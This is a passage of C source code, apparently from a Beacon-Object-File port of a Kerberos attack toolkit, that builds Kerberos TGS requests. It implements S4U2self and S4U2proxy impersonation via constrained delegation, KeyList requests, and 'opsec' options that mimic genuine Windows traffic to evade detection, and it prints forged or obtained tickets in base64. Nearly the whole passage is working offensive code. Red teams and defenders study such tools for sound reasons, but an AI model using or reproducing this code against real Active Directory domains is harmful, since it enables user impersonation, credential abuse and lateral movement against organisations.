        if (checksum(key.key_value, key.key_size, userIDBytes, userIDBytes_length, KERB_CHECKSUM_RSA_MD4, KRB_KEY_USAGE_PA_S4U_X509_USER, &cksumBytes, &cksumBytesLength)) return TRUE;

    pa->cksum.cksumtype = KERB_CHECKSUM_HMAC_SHA1_96_AES256;
    pa->cksum.checksum_length = cksumBytesLength;
    pa->cksum.checksum = cksumBytes;

    pa_data->type = PADATA_PA_S4U_X509_USER;
    pa_data->value = pa;
    return FALSE;
}

BOOL New_PA_DATA_s4u2self(EncryptionKey key, char* name, char* realm, PA_DATA* pa_data) {
    int realm_length = my_strlen(realm);
    int name_length = my_strlen(name);

    PA_FOR_USER* pa = MemAlloc(sizeof(PA_FOR_USER));

    pa->userName.name_count = 1;
    pa->userName.name_type = PRINCIPAL_NT_ENTERPRISE;
    pa->userName.name_string = MemAlloc(sizeof(void*) * pa->userName.name_count);
    if (!pa->userName.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }

    if (my_copybuf(&(pa->userName.name_string[0]), name, name_length + 1)) return TRUE;
    if (my_copybuf(&(pa->userRealm), realm, realm_length + 1)) return TRUE;
    if (my_copybuf(&(pa->auth_package), "Kerberos", 9)) return TRUE;

    byte nameTypeBytes[] = { 0,0,0,0 };
    nameTypeBytes[0] = 0xa;
    byte* finalBytes = MemAlloc(4 + name_length + realm_length + 8);
    MemCpy(finalBytes, nameTypeBytes, 4);
    MemCpy(finalBytes + 4, name, name_length);
    MemCpy(finalBytes + 4 + name_length, realm, realm_length);
    MemCpy(finalBytes + 4 + name_length + realm_length, pa->auth_package, 8);

    byte* outBytes = NULL;
    int outBytesLength = 0;
    if (checksum(key.key_value, key.key_size, finalBytes, 4 + name_length + realm_length + 8, KERB_CHECKSUM_HMAC_MD5, KRB_KEY_USAGE_KRB_NON_KERB_CKSUM_SALT, &outBytes, &outBytesLength)) return TRUE;

    pa->cksum.cksumtype = KERB_CHECKSUM_HMAC_MD5;
    pa->cksum.checksum_length = outBytesLength;
    pa->cksum.checksum = outBytes;

    pa_data->type = PADATA_S4U2SELF;
    pa_data->value = pa;
    return FALSE;
}

BOOL New_PA_DATA_KeyListReq(int eType, PA_DATA* pa_data) {
    PA_KEY_LIST_REQ* pa = MemAlloc(sizeof(PA_KEY_LIST_REQ));
    pa->Enctype = eType;

    pa_data->type = PADATA_KEY_LIST_REQ;
    pa_data->value = pa;
    return FALSE;
}

BOOL New_PA_DATA_options(BOOL claims, BOOL branch, BOOL fullDC, BOOL rbcd, PA_DATA* pa_data) {
    PA_PAC_OPTIONS* pac = MemAlloc(sizeof(PA_PAC_OPTIONS));
    if (claims) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 8);
    if (branch) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 4);
    if (fullDC) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 2);
    if (rbcd) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 1);
    pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] * 0x10);

    pa_data->type = PADATA_PA_PAC_OPTIONS;
    pa_data->value = pac;
    return FALSE;
}

BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, EncryptionKey clientKey, BOOL opsec, byte* req_body, int req_body_length, PA_DATA* pa_data) {

    AP_REQ* ap_req = MemAlloc(sizeof(AP_REQ));
    if (!ap_req) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    ap_req->pvno = 5;
    ap_req->msg_type = KERB_AP_REQ;
    ap_req->ap_options = 0;
    ap_req->ticket = providedTicket;
    ap_req->keyUsage = KRB_KEY_USAGE_TGS_REQ_PA_AUTHENTICATOR;
    ap_req->key = clientKey;

    DateTime dt = GetGmTimeAdd(0);

    if (my_copybuf(&(ap_req->authenticator.crealm), crealm, my_strlen(crealm) + 1)) return TRUE;

    ap_req->authenticator.authenticator_vno = 5;
    ap_req->authenticator.ctime = dt;
    ap_req->authenticator.cname.name_count = 1;
    ap_req->authenticator.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    ap_req->authenticator.cname.name_string = MemAlloc(sizeof(void*) * ap_req->authenticator.cname.name_count);
    if (!ap_req->authenticator.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    if (my_copybuf(&(ap_req->authenticator.cname.name_string[0]), cname, my_strlen(cname) + 1)) return TRUE;

    if (opsec) {
        ADVAPI32$SystemFunction036(&(ap_req->authenticator.seq_number), 4);
        PRINT_OUT("[+] Sequence number is: %u\n", ap_req->authenticator.seq_number);
        ADVAPI32$SystemFunction036(&(ap_req->authenticator.cusec), 4);
        ap_req->authenticator.cusec = ap_req->authenticator.cusec % 1000000;

        if (req_body) {
            ap_req->authenticator.cksum.cksumtype = KERB_CHECKSUM_RSA_MD5;
            ap_req->authenticator.cksum.checksum_length = req_body_length;
            ap_req->authenticator.cksum.checksum = req_body;
        }
    }

    pa_data->type = PADATA_AP_REQ;
    pa_data->value = ap_req;
    return FALSE;
}

BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
    if (asn_TGS_REP.tagValue != KERB_TGS_REP) {
        PRINT_OUT("TGS-REP tag value should be 13");
        return TRUE;
    }
    if ((asn_TGS_REP.subCount != 1) || (asn_TGS_REP.sub[0].tagValue != 16)) {
        PRINT_OUT("First TGS-REP sub should be a sequence");
        return TRUE;
    }

    // extract the KDC-REP out
    AsnElt* kdc_rep = asn_TGS_REP.sub[0].sub;
    for (int i = 0; i < asn_TGS_REP.sub[0].subCount; i++) {
        int tagValue = kdc_rep[i].tagValue;
        if ( tagValue == 0 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->pvno))) return TRUE;
        }
        if ( tagValue == 1 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->msg_type))) return TRUE;
        }
        if ( tagValue == 2 ) {
            if (AsnGetPaData(&(kdc_rep[i].sub[0]), &(tgs_rep->padata))) return TRUE;
        }
        if ( tagValue == 3 ) {
            if (AsnGetString(&(kdc_rep[i].sub[0]), &(tgs_rep->crealm))) return TRUE;
        }
        if ( tagValue == 4 ) {
            if (AsnGetPrincipalName(&(kdc_rep[i].sub[0]), &(tgs_rep->cname))) return TRUE;
        }
        if ( tagValue == 5 ) {
            if (AsnGetTicket(&(kdc_rep[i].sub[0].sub[0]), &(tgs_rep->ticket))) return TRUE;
        }
        if ( tagValue == 6 ) {
            if (AsnGetEncryptedData(&(kdc_rep[i].sub[0]), &(tgs_rep->enc_part))) return TRUE;
        }
    }
    return FALSE;
}

BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket providedTicket, EncryptionKey clientKey, int requestEType, byte* tgs, BOOL opsec, BOOL u2u, BOOL unconstrained, char* targetDomain, char* s4uUser, BOOL keyList, BOOL renew, byte** reqBytes, int* reqBytesSize) {
    AS_REQ req = { 0 };

    req.pvno = 5;
    req.msg_type = 12;

    req.req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    req.req_body.till = 24 * 3600;		 // valid for 1h
    ADVAPI32$SystemFunction036(&(req.req_body.nonce), 4);

    if (!opsec && !u2u) {
        req.req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
        req.req_body.cname.name_count = 1;
        req.req_body.cname.name_string = MemAlloc(sizeof(void*) * req.req_body.cname.name_count);
        if (!req.req_body.cname.name_string) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        if (my_copybuf(&(req.req_body.cname.name_string[0]), userName, my_strlen(userName) + 1)) return TRUE;
    }

    if (targetDomain == NULL)
        if (my_copybuf(&targetDomain, domain, my_strlen(domain) + 1)) return TRUE;

    int partsCount = 0;
    char** parts = my_strsplit( sname, '/', &partsCount );

    if (my_copybuf(&req.req_body.realm, targetDomain, my_strlen(targetDomain) + 1)) return TRUE;
    StrToUpper(req.req_body.realm);

    req.req_body.etypes_count = 0;
    int etypeIndex = 0;
    if (s4uUser && opsec)
        req.req_body.etypes_count += 1;

    if (requestEType == subkey_keymaterial) {
        req.req_body.etypes_count += 4;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = aes256_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = aes128_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = rc4_hmac;
        req.req_body.etypes[etypeIndex++] = rc4_hmac_exp;
    }
    else if (opsec && (partsCount > 1) && my_strcmp(parts[0], "krbtgt")) {
        req.req_body.etypes_count += 5;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = aes256_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = aes128_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = rc4_hmac;
        req.req_body.etypes[etypeIndex++] = rc4_hmac_exp;
        req.req_body.etypes[etypeIndex++] = old_exp;
    }
    else {
        req.req_body.etypes_count += 1;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = requestEType;
    }

    if (s4uUser) {
        if (u2u) {
            req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE | ENCTKTINSKEY | FORWARDABLE | RENEWABLE | RENEWABLEOK;
            req.req_body.sname.name_type = PRINCIPAL_NT_UNKNOWN;
            req.req_body.sname.name_count = 1;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), sname, my_strlen(sname) + 1);
        }
        else {
            req.req_body.sname.name_type = PRINCIPAL_NT_PRINCIPAL;
            req.req_body.sname.name_count = 1;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), userName, my_strlen(userName) + 1);
        }

        if (opsec)
            req.req_body.etypes[etypeIndex++] = old_exp;
        else
            req.req_body.kdc_options = req.req_body.kdc_options | ENCTKTINSKEY;
    }
    else if (u2u) {
        req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE | ENCTKTINSKEY | FORWARDABLE | RENEWABLE | RENEWABLEOK;
        req.req_body.sname.name_type = PRINCIPAL_NT_PRINCIPAL;
        req.req_body.sname.name_count = 1;
        req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
        my_copybuf(&(req.req_body.sname.name_string[0]), sname, my_strlen(sname) + 1);
    }
    else {
        if (partsCount == 1) {
            // service and other unique instance (e.g. krbtgt)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = 2;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), domain, my_strlen(domain) + 1);
        }
        else if (partsCount == 2) {
            //      SPN (sname/server.domain.com)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = 2;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), parts[1], my_strlen(parts[1]) + 1);
        }
        else if (partsCount == 3) {
            //      SPN (sname/server.domain.com/blah)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_HST;
            req.req_body.sname.name_count = 3;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), parts[1], my_strlen(parts[1]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[2]), parts[2], my_strlen(parts[2]) + 1);
        }
        else {
            PRINT_OUT("[X] Error: invalid TGS_REQ sname '%s'\n", sname);
        }
    }

    if (renew)
        req.req_body.kdc_options = req.req_body.kdc_options | RENEW;

    KRB_CRED kirbi_tgs = { 0 };
    if (tgs) {
        int bytesTgsSize = 0;
        byte* bytesTgs = base64_decode(tgs, &bytesTgsSize);

        AsnElt   asn_KRB_CRED = { 0 };
        if (BytesToAsnDecode3(bytesTgs, bytesTgsSize, FALSE, &asn_KRB_CRED)) return TRUE;

        if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi_tgs)) return TRUE;

        req.req_body.additional_tickets_count = 1;
        req.req_body.additional_tickets = MemAlloc(sizeof(Ticket) * req.req_body.additional_tickets_count);
        req.req_body.additional_tickets[0] = kirbi_tgs.tickets[0];
        if (!u2u) {
            req.req_body.kdc_options = req.req_body.kdc_options | CONSTRAINED_DELEGATION | CANONICALIZE;
            req.req_body.kdc_options = req.req_body.kdc_options ^ (req.req_body.kdc_options & RENEWABLEOK);
        }
    }
    if (keyList)
        req.req_body.kdc_options = CANONICALIZE;

    byte* cksum_Bytes = NULL;
    int cksum_Bytes_length = 0;

    if (opsec) {
        req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE;
        if (unconstrained)
            req.req_body.kdc_options = req.req_body.kdc_options | FORWARDED;
        else
            req.req_body.kdc_options = req.req_body.kdc_options ^ (req.req_body.kdc_options & RENEWABLEOK);

        // get hostname and hostname of SPN
        int size = MAX_COMPUTERNAME_LENGTH + 2;
        char* hostname = MemAlloc(size);
        if (!hostname) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        KERNEL32$GetComputerNameA(hostname, &size);
        int netbiosSize = 16;
        int numSpaces = (size < netbiosSize) ? (netbiosSize - size) : 0;
        int i = 0;
        for (; i < numSpaces; i++)
            hostname[size + i] = ' ';
        hostname[size + numSpaces] = 0;

        char* targetHostName;
        if (partsCount > 1) {
            int substrIndex = my_strfind(parts[1], '.');
            if (substrIndex < 0)
                substrIndex = my_strlen(parts[1]) + 1;

            my_copybuf(&(targetHostName), parts[1], substrIndex);
            targetHostName[substrIndex] = 0;
            StrToUpper(targetHostName);
        }
        else {
            my_copybuf(&(targetHostName), hostname, my_strlen(hostname) + 1);
        }

        // create enc-authorization-data if target host is not the local machine
        if (my_strcmp(hostname, targetHostName) && (s4uUser == NULL) && !unconstrained) {
            ADIfRelevant ifrelevant = { 0 };
            ifrelevant.ad_type = 1;
            ifrelevant.ADData_count = 2;
            ifrelevant.ADData = MemAlloc(2 * sizeof(void*));

            ADRestrictionEntry restrictions = { 0 };
            restrictions.ad_type = 141; // KERB_AUTH_DATA_TOKEN_RESTRICTIONS;
            restrictions.restriction_type = 0;
            restrictions.restriction_length = 40;
            restrictions.restriction = ADRestrictionEntry_buildTokenStruct(1, 8192);

            ADKerbLocal kerbLocal = { 0 };
            kerbLocal.ad_type = 142; // KERB_LOCAL
            kerbLocal.ad_data_length = 16;
            kerbLocal.ad_data = MemAlloc(16);
            ADVAPI32$SystemFunction036(kerbLocal.ad_data, 16);

            ifrelevant.ADData[0] = &restrictions;
            ifrelevant.ADData[1] = &kerbLocal;

            AsnElt authDataSeq = { 0 }, authDataSeqContext = { 0 };
            if (AsnADIfRelevantEncode(&ifrelevant, &authDataSeq)) return TRUE;
            if (Make3(ASN_SEQUENCE, &authDataSeq, 1, &authDataSeqContext)) return TRUE;

            byte* authorizationDataBytes = NULL;
            int authorizationDataBytesLegth = 0;
            if (AsnToBytesEncode(&authDataSeqContext, &authorizationDataBytesLegth, &authorizationDataBytes)) return TRUE;

            req.req_body.enc_authorization_data.etype = clientKey.key_type;

            byte* enc_authorization_data = NULL;
            int enc_authorization_data_length = 0;
            if (encrypt(authorizationDataBytes, authorizationDataBytesLegth, clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA,
                        &(req.req_body.enc_authorization_data.cipher), &(req.req_body.enc_authorization_data.cipher_size))) return TRUE;
        }

        // S4U requests have a till time of 15 minutes in the future
        if (s4uUser)
            req.req_body.till = 900; // + 15 min

        // encode req_body for authenticator cksum
        AsnElt req_Body_ASN = { 0 }, req_Body_ASNSeq = { 0 }, req_Body_ASNSeqContext = { 0 };
        if (AsnKDCReqBodyEncode(&(req.req_body), &req_Body_ASN)) return TRUE;
        if (Make3(ASN_SEQUENCE, &req_Body_ASN, 1, &req_Body_ASNSeq)) return TRUE;
        if (MakeImplicit(ASN_CONTEXT, 4, &req_Body_ASNSeq, &req_Body_ASNSeqContext)) return TRUE;

        int req_Body_Bytes_length = ValueLength(&req_Body_ASNSeqContext);
        byte* req_Body_Bytes = MemAlloc(req_Body_Bytes_length);
        req_Body_Bytes_length = EncodeValue(&req_Body_ASNSeqContext, 0, req_Body_Bytes_length, req_Body_Bytes, 0);

        checksum(clientKey.key_value, clientKey.key_size, req_Body_Bytes, req_Body_Bytes_length, KERB_CHECKSUM_RSA_MD5, KRB_KEY_USAGE_KRB_NON_KERB_CKSUM_SALT, &cksum_Bytes, &cksum_Bytes_length);
    }

    // create the PA-DATA that contains the AP-REQ w/ appropriate authenticator/etc.
    PA_DATA padata = { 0 };
    if (New_PA_DATA(domain, userName, providedTicket, clientKey, opsec, cksum_Bytes, cksum_Bytes_length, &padata)) return TRUE;

    req.pa_data_count = 1 + (opsec && s4uUser) + (s4uUser || opsec || (tgs && !u2u)) + keyList;
    int padata_index = 0;
    req.pa_data = MemAlloc(req.pa_data_count * sizeof(PA_DATA));
    req.pa_data[padata_index++] = padata;

    // Add PA-DATA for KeyList request
    if (keyList) {
        PA_DATA keyListPaData = { 0 };
        if (New_PA_DATA_KeyListReq(rc4_hmac, &keyListPaData)) return TRUE;
        req.pa_data[padata_index++] = keyListPaData;
    }

    if (opsec && s4uUser) {
        // real packets seem to lowercase the domain in these 2 PA_DATA's
        StrToLower(domain);
        PA_DATA s4upadata = { 0 };
        if (New_PA_DATA_s4uX509user(clientKey, s4uUser, domain, req.req_body.nonce, clientKey.key_type, &s4upadata)) return TRUE;
        req.pa_data[padata_index++] = s4upadata;
    }

    // add final S4U PA-DATA
    if (s4uUser) {
        // constrained delegation yo'
        PA_DATA s4upadata = { 0 };
        if (New_PA_DATA_s4u2self(clientKey, s4uUser, domain, &s4upadata)) return TRUE;
        req.pa_data[padata_index++] = s4upadata;
    }
    else if (opsec) {
        PA_DATA padataoptions = { 0 };
        if (New_PA_DATA_options(FALSE, TRUE, FALSE, FALSE, &padataoptions)) return TRUE;
        req.pa_data[padata_index++] = padataoptions;
    }
    else if (tgs && !u2u) {
        PA_DATA padataoptions = { 0 };
        if (New_PA_DATA_options(FALSE, FALSE, FALSE, TRUE, &padataoptions)) return TRUE;
        req.pa_data[padata_index++] = padataoptions;
    }

    AsnElt reqAsn = { 0 };
    if (ReqToAsnEncode(req, 12, &reqAsn)) return TRUE;
    if (AsnToBytesEncode(&reqAsn, reqBytesSize, reqBytes)) return TRUE;

    if (opsec && s4uUser)
        StrToUpper(domain);

    return FALSE;
}

BOOL NewTGS_target_REQ(char* userName, char* user, char* domain, char* targetUsername, char* targetDomain, Ticket providedTicket, EncryptionKey clientKey, int requestEType, BOOL cross, char* requestDomain, byte** reqBytes, int* reqBytesSize) {
    AS_REQ req = { 0 };

    req.pvno = 5;
    req.msg_type = 12;

    req.req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    req.req_body.till = 24 * 3600;		    // valid for 1h
    ADVAPI32$SystemFunction036(&(req.req_body.nonce), 4);

    // create the PA-DATA that contains the AP-REQ w/ appropriate authenticator/etc.
    PA_DATA padata = { 0 };
    if (New_PA_DATA(domain, user, providedTicket, clientKey, FALSE, NULL, 0, &padata)) return TRUE;

    req.pa_data_count = 2;
    req.pa_data = MemAlloc(req.pa_data_count * sizeof(PA_DATA));
    req.pa_data[0] = padata;

    // which domain is the "local" domain for this TGS
    if (cross) {
        if (requestDomain) {
            if (my_copybuf(&(req.req_body.realm), requestDomain, my_strlen(requestDomain) + 1)) return TRUE;
        } else {
            if (my_copybuf(&(req.req_body.realm), targetDomain, my_strlen(targetDomain) + 1)) return TRUE;
        }
    }
    else {
        if (my_copybuf(&(req.req_body.realm), domain, my_strlen(domain) + 1)) return TRUE;
    }

    // add in our encryption types
    if (requestEType == subkey_keymaterial) {
        // normal behavior
        req.req_body.etypes_count = 4;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        req.req_body.etypes[0] = aes256_cts_hmac_sha1;
        req.req_body.etypes[1] = aes128_cts_hmac_sha1;
        req.req_body.etypes[2] = rc4_hmac;
        req.req_body.etypes[3] = rc4_hmac_exp;
    }
    else {
        // add in the supported etype specified
        req.req_body.etypes_count = 1;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        req.req_body.etypes[0] = requestEType;
    }

    PA_DATA s4upadata = { 0 };
    if (New_PA_DATA_s4u2self(clientKey, targetUsername, targetDomain, &s4upadata)) return TRUE;
    req.pa_data[1] = s4upadata;

    req.req_body.sname.name_type = PRINCIPAL_NT_ENTERPRISE;
    req.req_body.sname.name_count = 1;
    req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
    my_copybuf(&(req.req_body.sname.name_string[0]), userName, my_strlen(userName) + 1);

    req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE | FORWARDABLE;
    req.req_body.kdc_options = req.req_body.kdc_options ^ (req.req_body.kdc_options & RENEWABLEOK) ^ (req.req_body.kdc_options & RENEW);

    AsnElt reqAsn = { 0 };
    if (ReqToAsnEncode(req, 12, &reqAsn)) return TRUE;
    if (AsnToBytesEncode(&reqAsn, reqBytesSize, reqBytes)) return TRUE;

    return FALSE;
}

BOOL TGS(char* userName, char* domain, Ticket providedTicket, EncryptionKey clientKey, char* service, int requestEType, char* domainController, byte* tgs, BOOL opsec, BOOL ptt, BOOL u2u, char* targetDomain, char* targetUser, BOOL display, BOOL keyList, byte** retTgsBytes, int* retTgsBytesLength /*BOOL roast = FALSE, string asrepkey = "" */) {

    PRINT_OUT("\n[*] Building TGS - REQ request for: '%s'\n", service);

    byte* tgsBytes = NULL;
    int	  tgsBytesLength = 0;
    if (NewTGS_REQ(userName, domain, service, providedTicket, clientKey, requestEType, tgs, opsec, u2u, FALSE, targetDomain, targetUser, keyList, FALSE, &tgsBytes, &tgsBytesLength)) return TRUE;

    byte* response = NULL;
    int   responseSize = 0;
    sendBytes(domainController, "88", tgsBytes, tgsBytesLength, &response, &responseSize);
    if (responseSize == 0)
        return TRUE;

    // decode the supplied bytes to an AsnElt object
    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode(response, responseSize, &responseAsn)) return TRUE;

    if (responseAsn.tagValue == KERB_TGS_REP) {
        if (display)
            PRINT_OUT("[+] TGS request successful!\n");

        // parse the response to an TGS-REP
        TGS_REP rep = { 0 };
        if (NewTGS_REP(responseAsn, &rep)) return TRUE;

        byte* outBytes = NULL;
        int  outBytesLength = 0;
        if (decrypt(clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, rep.enc_part.cipher, rep.enc_part.cipher_size, &outBytes, &outBytesLength)) return TRUE;

        AsnElt ae = { 0 };
        if (BytesToAsnDecode(outBytes, outBytesLength, &ae)) return TRUE;

        EncKDCRepPart encRepPart = { 0 };
        if (AsnGetEncKDCRepPart(&(ae.sub[0]), &encRepPart)) return TRUE;

        EncryptionKey keyListHash = { 0 };

        // build the final KRB-CRED structure
        KRB_CRED cred = { 0 };
        cred.pvno = 5;
        cred.msg_type = 22;
        cred.ticket_count = 1;
        cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
        if (!cred.tickets) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.tickets[0] = rep.ticket;

        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
        KrbCredInfo info = { 0 };

        info.key = encRepPart.key;
        if (my_copybuf(&(info.key.key_value), encRepPart.key.key_value, encRepPart.key.key_size)) return TRUE;

        if (my_copybuf(&(info.prealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.pname = rep.cname;
        info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
        for (int i = 0; i < info.pname.name_count; i++)
            if (my_copybuf(&(info.pname.name_string[i]), rep.cname.name_string[i], my_strlen(rep.cname.name_string[i]) + 1)) return TRUE;

        info.flags = encRepPart.flags;
        info.starttime = encRepPart.starttime;
        info.endtime = encRepPart.endtime;
        info.renew_till = encRepPart.renew_till;

        if (my_copybuf(&(info.srealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.sname = encRepPart.sname;
        info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
        for (int i = 0; i < info.sname.name_count; i++)
            if (my_copybuf(&(info.sname.name_string[i]), encRepPart.sname.name_string[i], my_strlen(encRepPart.sname.name_string[i]) + 1)) return TRUE;

        cred.enc_part.ticket_count = 1;
        cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
        if (!cred.enc_part.ticket_info) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.enc_part.ticket_info[0] = info;

        AsnElt asnCred = { 0 };
        if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

        byte* kirbiBytes = NULL;
        int   kirbiBytesSize = 0;
        if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

        char* ticket = base64_encode(kirbiBytes, kirbiBytesSize);

        PRINT_OUT("[+] TGS request successful!\n");
        PRINT_OUT("[*] base64(ticket.kirbi):\n\n%s\n\n", ticket);

        if (display) {
            DescribeTicket(ticket);
        }

        *retTgsBytes = kirbiBytes;
        *retTgsBytesLength = kirbiBytesSize;
        return FALSE;
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
//        PRINT_OUT("\n\t[x] Kerberos error : %s\n", lookupKrbErrorCode(error_code));
    }
    else {
        PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
    }

    return TRUE;
}

BOOL S4U2Proxy(KRB_CRED kirbi, char* targetUser, char* targetSPN, char* domainController, char* altService, KRB_CRED tgs, BOOL opsec, BOOL ptt) {
    PRINT_OUT("[*] Impersonating user '%s' to target SPN '%s'\n", targetUser, targetSPN);
    char** altSnames = 0;
    int altsvcCount = 0;
    if (altService) {
        char* altsvc = 0;
        if (my_copybuf(&(altsvc), altService, my_strlen(altService) + 1)) return TRUE;

        altsvcCount = 0;
        altSnames = my_strsplit( altsvc, ',', &altsvcCount );

        if (altsvcCount == 1)
            PRINT_OUT("[*]   Final ticket will be for the alternate service '%s'\n", altService);
        else
            PRINT_OUT("[*]   Final tickets will be for the alternate services '%s'\n", altService);
    }

    // extract out the info needed for the TGS-REQ/S4U2Proxy execution
    char* userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
    char* domain = kirbi.enc_part.ticket_info[0].prealm;
    Ticket ticket = kirbi.tickets[0];
    EncryptionKey clientKey = kirbi.enc_part.ticket_info[0].key;

    PRINT_OUT("[*] Building S4U2proxy request for service: '%s'\n", targetSPN);

    AS_REQ s4u2proxyReq = { 0 };
    s4u2proxyReq.pvno = 5;
    s4u2proxyReq.msg_type = KERB_TGS_REQ;
    s4u2proxyReq.req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK | CONSTRAINED_DELEGATION;
    if (!opsec) {
        s4u2proxyReq.req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    }
    s4u2proxyReq.req_body.till = 1 * 3600;   // valid for 1h
    ADVAPI32$SystemFunction036(&(s4u2proxyReq.req_body.nonce), 4);

    if (my_copybuf(&(s4u2proxyReq.req_body.realm), domain, my_strlen(domain) + 1)) return TRUE;
//
    char* spn = 0;
    if (my_copybuf(&(spn), targetSPN, my_strlen(targetSPN) + 1)) return TRUE;

    int partsCount = 0;
    char** parts = my_strsplit( spn, '/', &partsCount );
    if (partsCount < 2)
        return TRUE;

    char* serverName = parts[partsCount - 1];
    s4u2proxyReq.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
    s4u2proxyReq.req_body.sname.name_count = partsCount;
    s4u2proxyReq.req_body.sname.name_string = MemAlloc(sizeof(void*) * s4u2proxyReq.req_body.sname.name_count);
    for (int i = 0; i < partsCount; i++)
        s4u2proxyReq.req_body.sname.name_string[i] = parts[i];

    if (opsec) {
        s4u2proxyReq.req_body.etypes_count = 5;
        s4u2proxyReq.req_body.etypes = MemAlloc(s4u2proxyReq.req_body.etypes_count * sizeof(DWORD));
        s4u2proxyReq.req_body.etypes[0] = aes128_cts_hmac_sha1;
        s4u2proxyReq.req_body.etypes[1] = aes256_cts_hmac_sha1;
        s4u2proxyReq.req_body.etypes[2] = rc4_hmac;
        s4u2proxyReq.req_body.etypes[3] = rc4_hmac_exp;
        s4u2proxyReq.req_body.etypes[4] = old_exp;
    }
    else {
        s4u2proxyReq.req_body.etypes_count = 3;
        s4u2proxyReq.req_body.etypes = MemAlloc(s4u2proxyReq.req_body.etypes_count * sizeof(DWORD));
